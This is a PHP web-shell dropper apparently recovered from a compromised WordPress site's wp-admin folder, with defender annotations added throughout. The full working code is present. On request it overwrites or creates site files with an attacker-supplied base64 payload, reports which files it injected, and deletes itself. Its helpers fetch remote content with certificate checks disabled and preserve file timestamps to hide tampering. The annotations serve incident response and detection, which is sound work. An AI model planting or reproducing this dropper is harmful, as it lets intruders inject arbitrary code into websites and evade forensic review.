Current File: /home/infinitibizsol/cashforcarsrichardson.com/wp-admin/htwpbmca.php
<?php
// ---------------------------------------------------------------------------
// Analyst annotation (defender's notes on a file recovered from a compromised
// WordPress install; the page header places it under wp-admin/).
//
// What the top-level code below does, as written:
//   * Reads the raw request body and decodes it as JSON. Without a truthy 'up'
//     key it prints the marker string 'ok_sp3' and exits (a grep/IDS-friendly
//     fingerprint for this family).
//   * 'pathsForced' : site-root-relative paths that must already exist; each
//                     existing one is overwritten with the payload.
//   * 'pathsCreate' : paths created/overwritten with the payload, but only when
//                     'replace' is truthy AND at least one 'pathsForced' entry
//                     existed on disk.
//   * 'replace'     : compared loosely (== true), so any truthy JSON value
//                     enables writing.
//   * 'logger'      : base64-encoded bytes that become the file contents.
//   * Path entries are concatenated onto the site root with no normalisation.
//   * Deletes <root>/errirs.txt if present, creates <root>/images (mode 0777,
//     never referenced again), echoes {'exist': [...], 'injected': [...]} and
//     finally removes itself with unlink(__FILE__).
//
// Detection / response notes:
//   * chFile($path, true) leaves touched files mode 0755 (chown is attempted
//     but @-suppressed); saveContent() restores the original mtime with touch(),
//     so mtime is NOT a reliable indicator - compare ctime / integrity hashes.
//   * getContent(), saveContent() and random_string() are defined but never
//     called from the top-level code in this listing; presumably a shared
//     toolkit carried along with the dropper (assumption, not provable here).
//   * $domain is computed but never used.
//   * On this collapsed one-line rendering the "// skip" comment inside
//     saveContent() would swallow the rest of the line; the original file
//     presumably had a newline there (cannot be verified from the page).
// ---------------------------------------------------------------------------

$input = file_get_contents('php://input');
$data = json_decode($input, true);
if (empty($data['up'])) {
    echo 'ok_sp3';
    exit();
}

// Scheme detection; SERVER_PORT is compared loosely (== 443).
$protocol = ( (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') || $_SERVER['SERVER_PORT'] == 443 ) ? 'https://' : 'http://';
$domain = $protocol . $_SERVER['HTTP_HOST']; // computed, never used below

$shouldExist = [];
if (!empty($data['pathsForced'])) {
    $shouldExist = $data['pathsForced'];
}
$createIfnot = [];
if (!empty($data['pathsCreate'])) {
    $createIfnot = $data['pathsCreate'];
}
// Loose comparison: "1", 1, "yes", true all enable the write path.
$replace = isset($data['replace']) && $data['replace']==true;
$logger = '';
if (!empty($data['logger'])) {
    $logger = base64_decode($data['logger']);
}
$r=getSiteRoot();
// Removes a leftover file from the web root after opening its permissions.
$log = $r.'/errirs.txt';
if (file_exists($log)) {
    chFile($log,true);
    unlink($log);
}
if (!empty($data['up'])){
    $existPaths = [];
    $injected = [];
    // Pass 1: overwrite every forced path that already exists.
    foreach ($shouldExist as $pathExist) {
        $path = $r .$pathExist;
        if (file_exists($path)){
            $existPaths[] = str_replace($r, '',$path);
            if($replace && $logger){
                chFile($path,true);
                if(file_put_contents($path,$logger)){
                    $injected[] = str_replace($r, '',$path);
                }
            }
        }
    }
    // Pass 2: only runs when pass 1 found at least one existing forced path.
    if($replace && count($existPaths)>0 && $logger){
        $pathImages = $r . '/images';
        if(!is_dir($pathImages)){
            mkdir($pathImages, 0777, true);
        }
        foreach ($createIfnot as $pathExist) {
            $path = $r .$pathExist;
            if($replace && $logger){
                // chFile() returns false for a not-yet-existing file; the write below still creates it.
                chFile($path,true);
                if(file_put_contents($path,$logger)){
                    $injected[] = str_replace($r, '',$path);
                }
            }
        }
    }
    // Reports back which paths were seen / written, then self-deletes.
    echo json_encode(['exist'=>$existPaths,'injected'=>$injected]);
    unlink(__FILE__);
}

/**
 * Changes owner and mode of $file.
 *
 * $open = true : chown to the current process user (posix_getpwuid ->
 *                get_current_user -> literal 'www-data') and chmod 0755.
 * $open = false: chown 'root' and chmod 0555.
 * Both syscalls are @-suppressed, so failures (chown normally requires root)
 * are silent. Returns the AND of both results, or false if $file is absent.
 */
function chFile($file, $open) {
    if (!file_exists($file)) {
        return false;
    }
    $chmodOk = true;
    $chownOk = true;
    if ($open) {
        if (function_exists('posix_getpwuid')) {
            $user = posix_getpwuid(posix_geteuid())['name'];
        } elseif (function_exists('get_current_user')) {
            $user = get_current_user();
        } else {
            $user = 'www-data';
        }
        $chownOk = @chown($file, $user);
        $chmodOk = @chmod($file, 0755);
    } else {
        $user = 'root';
        $chownOk = @chown($file, $user);
        $chmodOk = @chmod($file, 0555);
    }
    return $chownOk && $chmodOk;
}

/**
 * Resolves the web root: realpath(DOCUMENT_ROOT) when set; otherwise walks up
 * from __DIR__ one dirname() per path segment of REQUEST_URI.
 */
function getSiteRoot(){
    if (!empty($_SERVER['DOCUMENT_ROOT'])) {
        return realpath($_SERVER['DOCUMENT_ROOT']);
    }
    $uri = parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH);
    $parts = explode('/', trim($uri, '/'));
    $levelsUp = count($parts);
    $dir = realpath(__DIR__);
    for ($i = 0; $i < $levelsUp; $i++) {
        $dir = dirname($dir);
    }
    return $dir;
}

/**
 * Fetches $url with a spoofed desktop Chrome User-Agent, trying in order:
 * file_get_contents -> curl -> fopen -> raw fsockopen GET. TLS peer and
 * hostname verification are disabled in both the stream context and the
 * curl options. Returns the body, or false when every method fails.
 * Not called anywhere in this listing.
 */
function getContent($url, $timeout = 40) {
    $ua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36';
    $headers = "User-Agent: $ua\r\n" . "Accept: */*\r\n" . "Accept-Language: en-US,en;q=0.9\r\n" . "Accept-Encoding: identity\r\n";
    // Certificate validation switched off: any TLS endpoint is accepted.
    $ctx = stream_context_create(array(
        'http' => array(
            'timeout' => $timeout,
            'header' => $headers
        ),
        'ssl' => array(
            'verify_peer' => false,
            'verify_peer_name' => false,
        )
    ));
    $data = @file_get_contents($url, false, $ctx);
    if ($data !== false) return $data;
    if (function_exists('curl_init')) {
        $ch = curl_init($url);
        curl_setopt_array($ch, array(
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_CONNECTTIMEOUT => $timeout,
            CURLOPT_TIMEOUT => $timeout,
            CURLOPT_USERAGENT => $ua,
            CURLOPT_ENCODING => '',
            CURLOPT_HTTPHEADER =>array(
                'Accept: */*',
                'Accept-Language: en-US,en;q=0.9',
                'Accept-Encoding: identity'
            ),
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_SSL_VERIFYHOST => 0
        ));
        $data = curl_exec($ch);
        curl_close($ch);
        if ($data !== false) return $data;
    }
    if (ini_get('allow_url_fopen')) {
        $fp = @fopen($url, 'rb', false, $ctx);
        if ($fp) {
            $data = stream_get_contents($fp);
            fclose($fp);
            if ($data !== false) return $data;
        }
    }
    // Last resort: hand-written HTTP/1.1 GET over a raw socket; the body is
    // whatever follows the first blank line (no transfer-encoding handling).
    $p = parse_url($url);
    if (!empty($p['host'])) {
        $scheme = (isset($p['scheme']) ? $p['scheme'] : 'http') === 'https' ? 'ssl' : 'tcp';
        $port = (isset($p['scheme']) && $p['scheme'] === 'https') ? 443 : 80;
        $host = $p['host'];
        $path = (isset($p['path']) ? $p['path'] : '/') . (isset($p['query']) ? '?' . $p['query'] : '');
        $fp = @fsockopen("$scheme://$host", $port, $e, $s, $timeout);
        if ($fp) {
            fwrite($fp, "GET $path HTTP/1.1\r\n" . "Host: $host\r\n" . $headers . "Connection: close\r\n\r\n" );
            $resp = stream_get_contents($fp);
            fclose($fp);
            if ($resp && ($pos = strpos($resp, "\r\n\r\n")) !== false) {
                return substr($resp, $pos + 4);
            }
        }
    }
    return false;
}

/**
 * Writes $source to $path, creating the parent directory (0755) if needed.
 * For a pre-existing file it records the mtime, chmods 0644 when not writable,
 * and after a successful write restores atime/mtime via touch() and chmods
 * 0555 - i.e. the modification timestamp is deliberately preserved, so mtime
 * cannot be trusted when triaging. Four write strategies are tried in turn:
 * file_put_contents, fopen/fwrite, SplFileObject, php://temp stream copy.
 * All errors are @-suppressed. Returns true on success, false otherwise.
 * Not called anywhere in this listing.
 */
function saveContent($path, $source){
    $dir = dirname($path);
    if (!is_dir($dir)) {
        @mkdir($dir, 0755, true);
    }
    $fileExistPath = file_exists($path);
    if ($fileExistPath){
        $stat = stat($path);
        $originalMTime = $stat['mtime'];
        if (!is_writable($path)) {
            @chmod($path, 0644);
            if (!is_writable($path)) return false;
        }
    }
    if (@file_put_contents($path, $source) !== false) {
        if ($fileExistPath){
            @touch($path, $originalMTime, $originalMTime);
            @chmod($path, 0555);
        }
        return true;
    }
    $fp = @fopen($path, 'wb');
    if ($fp) {
        $written = @fwrite($fp, $source);
        fclose($fp);
        if ($written !== false) {
            if ($fileExistPath){
                @touch($path, $originalMTime, $originalMTime);
                @chmod($path, 0555);
            }
            return true;
        }
    }
    try {
        $file = new SplFileObject($path, 'wb');
        $bytes = $file->fwrite($source);
        if ($bytes !== false) {
            if ($fileExistPath){
                @touch($path, $originalMTime, $originalMTime);
                @chmod($path, 0555);
            }
            return true;
        }
    } catch (Exception $e) {
        // skip - fall through to the next write strategy
    }
    $temp = @fopen('php://temp', 'r+');
    if ($temp) {
        fwrite($temp, $source);
        rewind($temp);
        $dest = @fopen($path, 'wb');
        if ($dest) {
            stream_copy_to_stream($temp, $dest);
            fclose($dest);
            fclose($temp);
            if ($fileExistPath){
                @touch($path, $originalMTime, $originalMTime);
                @chmod($path, 0555);
            }
            return true;
        }
        fclose($temp);
    }
    return false;
}

/**
 * Returns a random alphanumeric string of $length characters (default 6),
 * drawn with random_int(). Not called anywhere in this listing.
 */
function random_string($length = 6) {
    $chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
    $str = '';
    for ($i = 0; $i < $length; $i++) {
        $str .= $chars[random_int(0, strlen($chars) - 1)];
    }
    return $str;
}
?>